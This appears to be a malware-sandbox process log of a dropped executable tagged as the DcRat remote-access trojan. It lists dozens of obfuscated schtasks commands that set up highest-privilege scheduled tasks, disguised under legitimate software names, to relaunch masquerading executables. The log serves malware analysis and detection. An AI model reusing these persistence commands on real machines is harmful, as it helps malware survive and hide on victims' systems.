C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2736 -
C:\Windows\system32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit3⤵PID:928
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"4⤵PID:2548
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2192
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2324
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit3⤵PID:2096
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST4⤵PID:2760
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2368
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2004
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2832
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2020
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2268
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2188
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:568
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3020
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:904
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3024
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2140
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1224
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2252
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:896
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2280
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1380
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1916
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2944
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1972
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:936
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1772
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:576
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1148
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3052
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1724
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1056
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2148
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2012
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1500
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2484
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1704
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1836
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:888
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1320
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1584
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3020
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2244
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2676
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1308
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2600
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3028
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1600
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2640
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1896
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1168
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2760
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1728
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2776
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3000
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2984
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2396
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:792
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1852
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1836
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2988
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:708
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2380
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:856
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:820
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3032
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1500
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:916
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1052
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2604
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2632
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2496
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2372
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1588
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2148
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2948
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2776
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2504
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2084
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2076
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2804
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:316
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2172
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2112
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:720
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2392
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1692
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2548
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2592
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1520
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2648
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:620
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2260
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:928
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:708
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1848
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2760
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2700
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2012
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2396
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2132
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2276
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2400
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2496
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3024
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2368
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2192
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2392
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2136
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3032
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2624
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2248
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3068
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2432
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2056
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:708
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:556
-
-
-
